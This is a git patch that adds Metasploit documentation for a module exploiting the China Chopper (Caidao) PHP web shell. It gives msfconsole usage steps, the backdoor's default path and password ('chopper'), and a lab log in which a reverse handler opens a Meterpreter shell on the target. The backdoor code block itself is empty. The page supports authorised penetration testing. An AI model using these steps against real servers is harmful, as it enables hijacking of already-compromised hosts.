From 51a2354fea69760a1f43f7867cfc86f1b2b06e2b Mon Sep 17 00:00:00 2001 From: Jay Turla Date: Sat, 20 Aug 2016 04:12:31 +0800 Subject: [PATCH] Add KB for multi/http/caidao_php_backdoor_exec --- .../multi/http/caidao_php_backdoor_exec.md | 49 +++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 documentation/modules/exploit/multi/http/caidao_php_backdoor_exec.md diff --git a/documentation/modules/exploit/multi/http/caidao_php_backdoor_exec.md b/documentation/modules/exploit/multi/http/caidao_php_backdoor_exec.md new file mode 100644 index 0000000000..36949fd35e --- /dev/null +++ b/documentation/modules/exploit/multi/http/caidao_php_backdoor_exec.md @@ -0,0 +1,49 @@ +China Chopper Caidao PHP Backdoor or simply [Chinese Caidao](https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html) is a webshell manager coded in PHP. + +## Vulnerable Application + +Here is the PHP code of the backdoor that you can use and save it as caidao.php: + +``` + +``` + +## Verification Steps + + 1. Install the application + 2. Start msfconsole + 3. Do: `use exploit/multi/http/caidao_php_backdoor_exec` + 4. Do: `set rport ` + 5. Do: `set rhost ` + 6. Do: `check` +``` +[+] 192.168.1.103:80 - The target is vulnerable. +``` + 8. Do: `exploit` + 9. You should get a shell. + +## Options + + **TARGETURI** + + TARGETURI by default is `/caidao.php`, which is the common filename of the backdoor. + + **PASSWORD** + + PASSWORD by default is `chopper`, which is the password of the backdoor. + +## Demonstration + +``` +msf exploit(caidao_php_backdoor_exec) > exploit + +[*] Started reverse handler on 192.168.1.108:4444 +[*] Sending stage (33068 bytes) to 192.168.1.103 +[*] Meterpreter session 2 opened (192.168.1.108:4444 -> 192.168.1.103:42349) at 2015-11-02 09:05:54 +0000 + +meterpreter > sysinfo +Computer : kali +OS : Linux kali 3.14-kali1-686-pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) i686 +Meterpreter : php/php + +```